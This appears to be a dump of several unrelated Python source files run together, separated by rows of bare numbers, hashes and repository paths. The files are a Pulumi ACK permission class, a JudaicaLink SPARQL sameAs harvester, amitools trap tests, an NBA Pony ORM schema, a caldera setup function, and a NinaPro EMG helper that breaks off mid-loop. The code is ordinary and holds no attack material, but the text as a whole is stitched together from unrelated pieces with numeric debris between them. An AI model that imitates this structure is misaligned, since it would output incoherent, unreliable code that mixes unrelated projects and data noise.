        :param str resource_id: The permission settings to manage ACK clusters.
        :param str resource_type: The authorization type. Valid values `cluster`, `namespace` and `console`.
        :param str role_name: The name of the predefined role. If a custom role is assigned, the value is the name of the assigned custom role.
        :param bool is_owner: Indicates whether the permissions are granted to the cluster owner. Valid values `0`, `1`.
        :param bool is_ram_role: Indicates whether the permissions are granted to the RAM role. Valid values `0`, `1`.
        :param str role_type: The predefined role. Valid values `admin`, `ops`, `dev`, `restricted` and `custom`.
        """
        # Required identification of the permission target.
        pulumi.set(__self__, "resource_id", resource_id)
        pulumi.set(__self__, "resource_type", resource_type)
        pulumi.set(__self__, "role_name", role_name)
        # Optional flags/role information.
        if is_owner is not None:
            pulumi.set(__self__, "is_owner", is_owner)
        if is_ram_role is not None:
            pulumi.set(__self__, "is_ram_role", is_ram_role)
        if role_type is not None:
            pulumi.set(__self__, "role_type", role_type)

    @property
    @pulumi.getter(name="resourceId")
    def resource_id(self) -> str:
        """The permission settings to manage ACK clusters."""
        return pulumi.get(self, "resource_id")

    @resource_id.setter
    def resource_id(self, value: str):
        pulumi.set(self, "resource_id", value)

    @property
    @pulumi.getter(name="resourceType")
    def resource_type(self) -> str:
        """The authorization type. Valid values `cluster`, `namespace` and `console`."""
        return pulumi.get(self, "resource_type")

    @resource_type.setter
    def resource_type(self, value: str):
        pulumi.set(self, "resource_type", value)

    @property
    @pulumi.getter(name="roleName")
    def role_name(self) -> str:
        """The name of the predefined role. If a custom role is assigned, the value is the name of the assigned custom role."""
        return pulumi.get(self, "role_name")

    @role_name.setter
    def role_name(self, value: str):
        pulumi.set(self, "role_name", value)

    @property
    @pulumi.getter(name="isOwner")
    def is_owner(self) -> Optional[bool]:
        """Indicates whether the permissions are granted to the cluster owner. Valid values `0`, `1`."""
        return pulumi.get(self, "is_owner")

    @is_owner.setter
    def is_owner(self, value: Optional[bool]):
        pulumi.set(self, "is_owner", value)

    @property
    @pulumi.getter(name="isRamRole")
    def is_ram_role(self) -> Optional[bool]:
        """Indicates whether the permissions are granted to the RAM role. Valid values `0`, `1`."""
        return pulumi.get(self, "is_ram_role")

    @is_ram_role.setter
    def is_ram_role(self, value: Optional[bool]):
        pulumi.set(self, "is_ram_role", value)

    @property
    @pulumi.getter(name="roleType")
    def role_type(self) -> Optional[str]:
        """The predefined role. Valid values `admin`, `ops`, `dev`, `restricted` and `custom`."""
        return pulumi.get(self, "role_type")

    @role_type.setter
    def role_type(self, value: Optional[str]):
        pulumi.set(self, "role_type", value)
| 37.546453
| 369
| 0.634957
| 10,939
| 88,910
| 4.992047
| 0.036018
| 0.108372
| 0.112291
| 0.135365
| 0.916679
| 0.869818
| 0.852348
| 0.837625
| 0.8253
| 0.806805
| 0
| 0.00317
| 0.244247
| 88,910
| 2,367
| 370
| 37.562315
| 0.809522
| 0.223676
| 0
| 0.800127
| 1
| 0
| 0.084771
| 0.018056
| 0
| 0
| 0
| 0
| 0
| 1
| 0.205602
| false
| 0
| 0.003183
| 0.031827
| 0.322724
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
73b8a65698ca533e97614e589e1fff5364310344
| 5,039
|
py
|
Python
|
interlinks/scripts/JudaicaLink-interlink-02.py
|
judaicalink/judaicalink-generators
|
845dbd6886fa82ec45adf16ba08fad9d26169419
|
[
"MIT"
] | 1
|
2020-09-20T17:00:05.000Z
|
2020-09-20T17:00:05.000Z
|
interlinks/scripts/JudaicaLink-interlink-02.py
|
wisslab/judaicalink-generators
|
845dbd6886fa82ec45adf16ba08fad9d26169419
|
[
"MIT"
] | null | null | null |
interlinks/scripts/JudaicaLink-interlink-02.py
|
wisslab/judaicalink-generators
|
845dbd6886fa82ec45adf16ba08fad9d26169419
|
[
"MIT"
] | null | null | null |
#Maral Dadvar
#02/10/2017
#This script looks for sameAs links between bhr and JudaicaLink
import unicodedata
import os , glob
import rdflib
from rdflib import Namespace, URIRef, Graph , Literal , OWL, RDFS , RDF
from SPARQLWrapper import SPARQLWrapper2, XML , JSON , TURTLE
import re
import pprint

# Raw string: 'C:\Users\...' is a SyntaxError on Python 3 ('\U' starts a
# \Uxxxxxxxx unicode escape); the raw literal is byte-identical to the intent.
os.chdir(r'C:\Users\Maral\Desktop')

# Local Fuseki endpoint holding the JudaicaLink datasets.
sparql = SPARQLWrapper2("http://localhost:3030/Datasets/sparql")

foaf = Namespace("http://xmlns.com/foaf/0.1/")
rdf = Namespace("http://www.w3.org/1999/02/22-rdf-syntax-ns#")
jl = Namespace("http://data.judaicalink.org/ontology/")
skos = Namespace("http://www.w3.org/2004/02/skos/core#")
owl = Namespace("http://www.w3.org/2002/07/owl#")

# Output graph collecting the harvested owl:sameAs links.
g = Graph()
g.bind('foaf', foaf)
g.bind('jl', jl)
g.bind('skos', skos)
g.bind('owl', owl)

spar1= """
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
PREFIX gndo: <http://d-nb.info/standards/elementset/gnd#>
PREFIX pro: <http://purl.org/hpi/patchr#>
PREFIX owl: <http://www.w3.org/2002/07/owl#>
PREFIX edm: <http://www.europeana.eu/schemas/edm/>
PREFIX dc: <http://purl.org/dc/elements/1.1/>
PREFIX foaf: <http://xmlns.com/foaf/0.1/>
PREFIX skos: <http://www.w3.org/2004/02/skos/core#>
PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX dblp: <http://dblp.org/rdf/schema-2015-01-26#>
PREFIX dcterms: <http://purl.org/dc/terms/>
PREFIX dbpedia: <http://dbpedia.org/resource/>
PREFIX jl: <http://data.judaicalink.org/ontology/>
PREFIX gnd: <http://d-nb.info/gnd/>
Select ?x ?sameas
From <http://maral.wisslab.org/graphs/yivo>
From <http://maral.wisslab.org/graphs/bhr>
From <http://maral.wisslab.org/graphs/rujen>
From <http://maral.wisslab.org/graphs/djh>
From <http://maral.wisslab.org/graphs/gnd_persons>
From <http://maral.wisslab.org/graphs/freimann-gnd>
where{
?x a foaf:Person.
?x owl:sameAs ?sameas.
}
"""

spar2= """
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
PREFIX gndo: <http://d-nb.info/standards/elementset/gnd#>
PREFIX pro: <http://purl.org/hpi/patchr#>
PREFIX owl: <http://www.w3.org/2002/07/owl#>
PREFIX edm: <http://www.europeana.eu/schemas/edm/>
PREFIX dc: <http://purl.org/dc/elements/1.1/>
PREFIX foaf: <http://xmlns.com/foaf/0.1/>
PREFIX skos: <http://www.w3.org/2004/02/skos/core#>
PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX dblp: <http://dblp.org/rdf/schema-2015-01-26#>
PREFIX dcterms: <http://purl.org/dc/terms/>
PREFIX dbpedia: <http://dbpedia.org/resource/>
PREFIX jl: <http://data.judaicalink.org/ontology/>
PREFIX gnd: <http://d-nb.info/gnd/>
Select ?x ?sameas
where{
graph <http://maral.wisslab.org/graphs/dbpedia_persons> {
?x a foaf:Person.
?x owl:sameAs ?sameas.
}}
"""

# Dataset URI prefixes whose sameAs targets we want to keep.
_JL_DATASETS = (
    'http://data.judaicalink.org/data/bhr',
    'http://data.judaicalink.org/data/yivo',
    'http://data.judaicalink.org/data/djh',
    'http://data.judaicalink.org/data/rujen',
    'http://data.judaicalink.org/data/gnd',
)


def _collect_sameas(query, prefixes):
    """Run *query* and copy each (?x owl:sameAs ?sameas) binding whose target
    contains one of *prefixes* into the global graph ``g``.
    Replaces the previous six copy-pasted ``if ... in ...: g.add(...)`` chains.
    """
    sparql.setQuery(query)
    sparql.setReturnFormat(TURTLE)
    results = sparql.query().convert()
    if (u"x", u"sameas") in results:
        for b in results[u"x", u"sameas"]:
            print(b)  # print() works on both Python 2 and 3; `print b` does not
            target = b[u"sameas"].value
            # Same membership test as the original (`substring in target`);
            # Graph.add is set-like, so a single add per binding is equivalent.
            if any(prefix in target for prefix in prefixes):
                g.add((URIRef(b[u"x"].value), owl.sameAs, URIRef(target)))


# First query: the dbpedia dataset is also harvested.
_collect_sameas(spar1, _JL_DATASETS + ('http://data.judaicalink.org/data/dbpedia',))
# Second query (dbpedia_persons graph): the original deliberately skipped dbpedia targets.
_collect_sameas(spar2, _JL_DATASETS)

g.serialize(destination = 'interlinks-03.ttl' , format="turtle")
| 32.301282
| 86
| 0.635444
| 788
| 5,039
| 4.060914
| 0.162437
| 0.020625
| 0.055
| 0.089375
| 0.831875
| 0.805938
| 0.745938
| 0.739375
| 0.73125
| 0.73125
| 0
| 0.030439
| 0.15896
| 5,039
| 155
| 87
| 32.509677
| 0.724634
| 0.016868
| 0
| 0.67619
| 0
| 0.019048
| 0.575096
| 0.004447
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.066667
| null | null | 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73c53775643d971d6d73ad15e29e1b86526f4469
| 986
|
py
|
Python
|
FictionTools/amitools/test/unit/machine_mocktraps.py
|
polluks/Puddle-BuildTools
|
c1762d53a33002b62d8cffe3db129505a387bec3
|
[
"BSD-2-Clause"
] | 38
|
2021-06-18T12:56:15.000Z
|
2022-03-12T20:38:40.000Z
|
FictionTools/amitools/test/unit/machine_mocktraps.py
|
polluks/Puddle-BuildTools
|
c1762d53a33002b62d8cffe3db129505a387bec3
|
[
"BSD-2-Clause"
] | 2
|
2021-06-20T16:28:12.000Z
|
2021-11-17T21:33:56.000Z
|
FictionTools/amitools/test/unit/machine_mocktraps.py
|
polluks/Puddle-BuildTools
|
c1762d53a33002b62d8cffe3db129505a387bec3
|
[
"BSD-2-Clause"
] | 6
|
2021-06-18T18:18:36.000Z
|
2021-12-22T08:01:32.000Z
|
from amitools.vamos.machine import MockTraps
def mock_traps_base_test():
    """MockTraps lifecycle: setup, trigger and free a plain (non-one-shot) trap."""
    traps = MockTraps()
    calls = []

    def handler(op, pc):
        # the mock dispatches with the a-line opcode and the trigger pc
        assert op == 0xA000
        assert pc == 0x42
        calls.append("huhu")

    assert traps.get_num_traps() == 0
    tid = traps.setup(handler)
    assert traps.get_num_traps() == 1
    assert traps.get_func(tid) == handler
    assert not traps.is_auto_rts(tid)
    assert not traps.is_one_shot(tid)
    traps.trigger(tid, pc=0x42)
    assert calls == ["huhu"]
    # a plain trap stays installed until freed explicitly
    traps.free(tid)
    assert traps.get_num_traps() == 0
def mock_traps_one_shot_test():
    """A one-shot trap fires once and is removed without an explicit free."""
    traps = MockTraps()
    calls = []

    def handler(op, pc):
        assert op == 0xA000
        assert pc == 0x42
        calls.append("huhu")

    assert traps.get_num_traps() == 0
    trap_id = traps.setup(handler, one_shot=True)
    assert traps.get_num_traps() == 1
    assert traps.get_func(trap_id) == handler
    assert not traps.is_auto_rts(trap_id)
    assert traps.is_one_shot(trap_id)
    traps.trigger(trap_id, pc=0x42)
    assert calls == ["huhu"]
    # One-shot traps free themselves after firing, so no free() call here.
    assert traps.get_num_traps() == 0
| 22.930233
| 44
| 0.598377
| 160
| 986
| 3.4625
| 0.23125
| 0.113718
| 0.144404
| 0.140794
| 0.826715
| 0.826715
| 0.792419
| 0.758123
| 0.758123
| 0.758123
| 0
| 0.035961
| 0.266734
| 986
| 42
| 45
| 23.47619
| 0.73029
| 0
| 0
| 0.764706
| 0
| 0
| 0.016227
| 0
| 0
| 0
| 0.028398
| 0
| 0.529412
| 1
| 0.117647
| false
| 0
| 0.029412
| 0
| 0.147059
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
73eda429df48ad19b32145618d4c6bc1edd0c368
| 4,506
|
py
|
Python
|
nba_percolator/schema.py
|
naturalis/nba_percolator
|
606d161c8b6e4eb4f62e0bf1f417ca43e0a9028a
|
[
"Apache-2.0"
] | null | null | null |
nba_percolator/schema.py
|
naturalis/nba_percolator
|
606d161c8b6e4eb4f62e0bf1f417ca43e0a9028a
|
[
"Apache-2.0"
] | null | null | null |
nba_percolator/schema.py
|
naturalis/nba_percolator
|
606d161c8b6e4eb4f62e0bf1f417ca43e0a9028a
|
[
"Apache-2.0"
] | null | null | null |
"""Dit is het NBA preprocessing database schema.
Hierin zitten tabel definities waarmee import data kan worden gefilterd alvorens
een import in de NBA documentstore plaatsvind.
"""
from datetime import datetime
from pony.orm import Database, Optional, Json, Required, raw_sql
# Single Pony ORM database handle; the actual connection is bound elsewhere
# (the entity classes below only declare the table structure).
db = Database()


# Every harvested data source gets two structurally identical tables:
#   <Source>_import  - freshly imported records, staged for filtering
#   <Source>_current - the records currently held as up to date
# Each row stores the raw record as JSON (rec), a content hash used to
# detect changed records (hash, indexed), and an insertion timestamp
# (datum, filled in by the database via sql_default='now()').
# NOTE(review): the attribute name 'hash' shadows the Python builtin, but
# renaming it would change the generated column name — left as-is.
class Nsrtaxa_import(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Nsrtaxa_current(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Nsrmedia_import(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Nsrmedia_current(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Crsspecimen_import(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Crsspecimen_current(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Crsmedia_import(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Crsmedia_current(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Brahmsspecimen_import(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Brahmsspecimen_current(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Brahmsmedia_import(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Brahmsmedia_current(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Xenocantospecimen_import(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Xenocantospecimen_current(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Xenocantomedia_import(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Xenocantomedia_current(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Coltaxa_import(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Coltaxa_current(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Waarnemingspecimen_import(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Waarnemingspecimen_current(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


# Note: for Waarnemingmedia the _current class is declared before _import,
# unlike the other sources; declaration order preserved from the original.
class Waarnemingmedia_current(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Waarnemingmedia_import(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Testspecimen_import(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Testspecimen_current(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Testmedia_import(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


class Testmedia_current(db.Entity):
    rec = Optional(Json)
    hash = Optional(str, index=True)
    datum = Required(datetime, sql_default='now()')


# Presumably tracks records that disappeared from a source; the exact
# status/count semantics are defined by the importer — verify against callers.
class Deleted_records(db.Entity):
    recid = Required(str, index=True)
    status = Required(str, index=True)
    count = Required(int, sql_default=1)
    datum = Required(datetime, sql_default='now()')
| 26.197674
| 80
| 0.695961
| 562
| 4,506
| 5.480427
| 0.113879
| 0.072727
| 0.109091
| 0.21039
| 0.88539
| 0.88539
| 0.874351
| 0.874351
| 0.874351
| 0.874351
| 0
| 0.000268
| 0.173103
| 4,506
| 171
| 81
| 26.350877
| 0.826355
| 0.038615
| 0
| 0.705357
| 0
| 0
| 0.031214
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.133929
| 0
| 1.107143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
fb853cf089a5f08ad9e122487a4b5691c91d8747
| 193
|
py
|
Python
|
caldera/_setup/__init__.py
|
jvrana/caldera
|
a346324e77f20739e00a82f97530dda4906f59dd
|
[
"MIT"
] | 2
|
2021-12-13T17:52:17.000Z
|
2021-12-13T17:52:18.000Z
|
caldera/_setup/__init__.py
|
jvrana/caldera
|
a346324e77f20739e00a82f97530dda4906f59dd
|
[
"MIT"
] | 4
|
2020-10-06T21:06:15.000Z
|
2020-10-10T01:18:23.000Z
|
caldera/_setup/__init__.py
|
jvrana/caldera
|
a346324e77f20739e00a82f97530dda4906f59dd
|
[
"MIT"
] | null | null | null |
from caldera._setup.setup_nx_global_access import add_global_access_to_nx
from caldera.defaults import CalderaDefaults
def setup():
    """Install caldera's global-access hook into networkx.

    Registers global access on networkx under the default key configured
    in CalderaDefaults.
    """
    default_key = CalderaDefaults.nx_global_key
    add_global_access_to_nx(default_key)
| 27.571429
| 73
| 0.865285
| 29
| 193
| 5.275862
| 0.448276
| 0.235294
| 0.196078
| 0.222222
| 0.248366
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088083
| 193
| 6
| 74
| 32.166667
| 0.869318
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
fb8f055112db1ea2b0d1602aacac4d6c0464a0b9
| 49,193
|
py
|
Python
|
nina_helper/nina_helper.py
|
jonDel/nina_helper_package_mk2
|
fc040e96fa7480f465d700d977e4cf11d6812d65
|
[
"MIT"
] | null | null | null |
nina_helper/nina_helper.py
|
jonDel/nina_helper_package_mk2
|
fc040e96fa7480f465d700d977e4cf11d6812d65
|
[
"MIT"
] | null | null | null |
nina_helper/nina_helper.py
|
jonDel/nina_helper_package_mk2
|
fc040e96fa7480f465d700d977e4cf11d6812d65
|
[
"MIT"
] | null | null | null |
"""Utility functions to help with working with NinaPro database."""
import os
import numpy as np
import scipy.io as sio
from sklearn.preprocessing import StandardScaler
from itertools import combinations, chain
from copy import copy
def db1_info():
    """Return relevant info on database 1.

    Returns:
        Dict: Useful information on database 1
    """
    nb_moves = 53  # 52 movements plus rest
    nb_reps = 10
    # One-based subject numbers; the *_ind entries are zero-based indices.
    # NOTE(review): 'male' overlaps 'female' in the source data; kept as-is.
    female = np.array([6, 8, 10, 14, 15, 20, 22])
    male = np.array([1, 2, 3, 4, 6, 8, 10, 11, 12, 15, 16, 17, 18, 20,
                     22, 23, 24, 25, 26, 27])
    left_handed = np.array([14, 16])
    right_handed = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 15,
                             17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27])
    return {
        # General info
        'nb_subjects': 27,
        'nb_channels': 10,
        'nb_moves': nb_moves,
        'nb_reps': nb_reps,
        'fs': 100,
        # Labels
        'rep_labels': np.arange(1, nb_reps + 1),
        'move_labels': np.arange(1, nb_moves + 1),
        # Sex
        'female': female,
        'male': male,
        'female_ind': female - 1,
        'male_ind': male - 1,
        # Handedness
        'left_handed': left_handed,
        'right_handed': right_handed,
        'left_handed_ind': left_handed - 1,
        'right_handed_ind': right_handed - 1,
        # Per-subject physical data (synced with subject order)
        'ages': np.array([31, 27, 22, 27, 27, 22, 28, 27, 23, 30, 28, 25, 27,
                          29, 26, 29, 30, 29, 34, 26, 38, 35, 30, 26, 28, 40,
                          28]),
        'heights': np.array([170, 170, 180, 183, 178, 163, 170, 164, 173, 160,
                             170, 185, 184, 155, 162, 167, 175, 178, 173, 165,
                             178, 168, 180, 180, 180, 179, 185]),
        'weights': np.array([75, 62, 85, 95, 75, 48, 60, 54, 63, 60, 67, 80,
                             85, 54, 60, 67, 76, 68, 82, 54, 73, 65, 65, 65,
                             70, 66, 100]),
    }
def db2_info():
    """Return relevant info on database 2.

    Returns:
        Dict: Useful information on database 2
    """
    nb_moves = 50  # 40 movements + 9 force movements + rest
    nb_reps = 6
    # One-based subject numbers; the *_ind entries are zero-based indices.
    female = np.array([4, 11, 14, 18, 19, 20, 22, 28, 35, 36, 38])
    male = np.array([1, 2, 3, 5, 6, 7, 8, 9, 10, 12, 13, 15, 16, 17, 21,
                     23, 24, 25, 26, 27, 29, 30, 31, 32, 33, 34, 37, 39, 40])
    left_handed = np.array([4, 13, 22, 25, 26])
    right_handed = np.array([1, 2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 14, 15, 16,
                             17, 18, 19, 20, 21, 23, 24, 27, 28, 29, 30, 31,
                             32, 33, 34, 35, 36, 37, 38, 39, 40])
    return {
        # General info
        'nb_subjects': 40,
        'nb_channels': 12,
        'nb_moves': nb_moves,
        'nb_reps': nb_reps,
        'fs': 2000,
        # Labels
        'rep_labels': np.arange(1, nb_reps + 1),
        'move_labels': np.arange(1, nb_moves + 1),
        # Sex
        'female': female,
        'male': male,
        'female_ind': female - 1,
        'male_ind': male - 1,
        # Handedness
        'left_handed': left_handed,
        'right_handed': right_handed,
        'left_handed_ind': left_handed - 1,
        'right_handed_ind': right_handed - 1,
        # Per-subject physical data (synced with subject order)
        'ages': np.array([29, 29, 31, 30, 25, 35, 27, 45, 23, 34, 32, 29, 30,
                          30, 30, 34, 29, 30, 31, 26, 32, 28, 25, 28, 31, 30,
                          29, 29, 27, 30, 29, 28, 25, 31, 24, 27, 34, 30, 31,
                          31]),
        'heights': np.array([187, 183, 174, 154, 175, 172, 187, 173, 172, 173,
                             150, 184, 182, 173, 169, 173, 175, 169, 158, 155,
                             170, 162, 170, 170, 168, 186, 170, 160, 171, 173,
                             185, 173, 183, 192, 170, 155, 190, 163, 183, 173]),
        'weights': np.array([75, 75, 69, 50, 70, 79, 92, 73, 63, 84, 54, 90,
                             70, 59, 58, 76, 70, 90, 52, 52, 75, 54, 66, 73,
                             70, 90, 65, 61, 64, 68, 98, 72, 71, 78, 52, 44,
                             105, 62, 96, 65]),
    }
def db3_info():
    """Return relevant info on database 3.

    Returns:
        Dict: Useful information on database 3
    """
    nb_subjects = 11
    nb_reps = 6
    majority_nb_moves = 50
    shared_labels = np.arange(1, majority_nb_moves + 1)
    # Per-subject acquisition details; most subjects share the same setup.
    subjects_data = [
        {'nb_channels': 12,
         'nb_moves': majority_nb_moves,
         'move_labels': shared_labels}
        for _ in range(nb_subjects)
    ]
    # Subjects at zero-based index 6 and 7 used only 10 electrodes.
    for idx in (6, 7):
        subjects_data[idx]['nb_channels'] = 10
    # Subjects at index 0 and 9 performed a reduced movement set.
    subjects_data[0]['nb_moves'] = 40
    subjects_data[0]['move_labels'] = np.arange(1, 41)
    subjects_data[9]['nb_moves'] = 43
    subjects_data[9]['move_labels'] = np.arange(1, 44)
    left_handed = np.array([4])
    right_handed = np.array([0, 1, 2, 3, 5, 6, 7, 8, 9, 10, 11])
    return {
        'subjects': subjects_data,
        'nb_subjects': nb_subjects,
        'nb_reps': nb_reps,
        'fs': 2000,
        'rep_labels': np.arange(1, nb_reps + 1),
        # Handedness; the amputated hand coincides with handedness here.
        'left_handed': left_handed,
        'right_handed': right_handed,
        'left_handed_amp': left_handed,
        'right_handed_amp': right_handed,
        # Per-subject clinical data (synced with subject order)
        'ages': np.array([32, 35, 0, 34, 67, 32, 35, 33, 44, 59, 45]),
        'heights': np.array([172, 183, 178, 166, 175, 172, 185, 175, 180,
                             177, 183]),
        'weights': np.array([86, 81, 82, 68, 75, 66, 75, 80, 95, 86, 75]),
        'rem_forearm': np.array([50, 70, 30, 40, 90, 40, 0, 50, 90, 50, 90]),
        'years_after_amp': np.array([13, 6, 5, 1, 1, 13, 7, 5, 14, 2, 5]),
        'amp_type': ["Accident"] * (nb_subjects - 1) + ["Cancer"],
        'phant_limb_sens': np.array([2, 5, 2, 1, 2, 4, 0, 2, 5, 5, 4]),
        'dash_score': np.array([1.67, 15.18, 22.5, 86.67, 11.67, 37.5, 31.67,
                                33.33, 3.33, 11.76, 12.5]),
        'cosm_use': np.array([0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0]),
        'kinem_use': np.array([0, 0, 8, 0, 0.4, 12, 0, 0, 0, 1.66, 5]),
        'myo_use': np.array([13, 0, 8, 0, 0, 0, 6, 4, 14, 0, 5]),
    }
def import_db1(folder_path, subject, rest_length_cap=999):
    """Function for extracting data from raw NinaiPro files for DB1.

    Args:
        folder_path (string): Path to folder containing raw mat files
        subject (int): 1-27 which subject's data to import
        rest_length_cap (int, optional): The number of seconds of rest data to keep before/after a movement

    Returns:
        Dictionary: Raw EMG data, corresponding repetition and movement labels, indices of where repetitions are
        demarked and the number of repetitions with capped off rest data
    """
    fs = 100  # DB1 sampling rate (Hz); converts rest_length_cap (s) to samples
    # Exercise file E1: take emg / refined repetition / refined stimulus as stored.
    cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_A1_E1.mat')
    data = sio.loadmat(cur_path)
    emg = np.squeeze(np.array(data['emg']))
    rep = np.squeeze(np.array(data['rerepetition']))
    move = np.squeeze(np.array(data['restimulus']))
    # Exercise file E2: movement labels restart at 1 per file, so offset all
    # non-rest labels by the largest label seen so far.
    cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_A1_E2.mat')
    data = sio.loadmat(cur_path)
    emg = np.vstack((emg, np.array(data['emg'])))
    rep = np.append(rep, np.squeeze(np.array(data['rerepetition'])))
    move_tmp = np.squeeze(np.array(data['restimulus']))  # Fix for numbering
    move_tmp[move_tmp != 0] += max(move)
    move = np.append(move, move_tmp)
    # Exercise file E3: same label-offset fix as E2.
    cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_A1_E3.mat')
    data = sio.loadmat(cur_path)
    emg = np.vstack((emg, np.array(data['emg'])))
    rep = np.append(rep, np.squeeze(np.array(data['rerepetition'])))
    move_tmp = np.squeeze(np.array(data['restimulus']))  # Fix for numbering
    move_tmp[move_tmp != 0] += max(move)
    move = np.append(move, move_tmp)
    move = move.astype('int8')  # To minimise overhead
    # Label repetitions using new block style: rest-move-rest regions.
    # move_regions holds indices where the movement label changes, so each
    # movement contributes a (start, end) pair of change points.
    move_regions = np.where(np.diff(move))[0]
    rep_regions = np.zeros((move_regions.shape[0],), dtype=int)
    nb_reps = int(round(move_regions.shape[0] / 2))
    last_end_idx = int(round(move_regions[0] / 2))  # start half-way into the leading rest
    nb_unique_reps = np.unique(rep).shape[0] - 1  # To account for 0 regions
    nb_capped = 0
    cur_rep = 1
    rep = np.zeros([rep.shape[0], ], dtype=np.int8)  # Reset rep array
    for i in range(nb_reps - 1):
        rep_regions[2 * i] = last_end_idx
        # Split the rest gap between two movements at its midpoint.
        midpoint_idx = int(round((move_regions[2 * (i + 1) - 1] +
                                  move_regions[2 * (i + 1)]) / 2)) + 1
        trailing_rest_samps = midpoint_idx - move_regions[2 * (i + 1) - 1]
        if trailing_rest_samps <= rest_length_cap * fs:
            # Rest gap short enough: the whole half-gap belongs to this rep.
            rep[last_end_idx:midpoint_idx] = cur_rep
            last_end_idx = midpoint_idx
            rep_regions[2 * i + 1] = midpoint_idx - 1
        else:
            # Cap the rest data kept on both sides of the gap.
            rep_end_idx = (move_regions[2 * (i + 1) - 1] +
                           int(round(rest_length_cap * fs)))
            rep[last_end_idx:rep_end_idx] = cur_rep
            last_end_idx = ((move_regions[2 * (i + 1)] -
                             int(round(rest_length_cap * fs))))
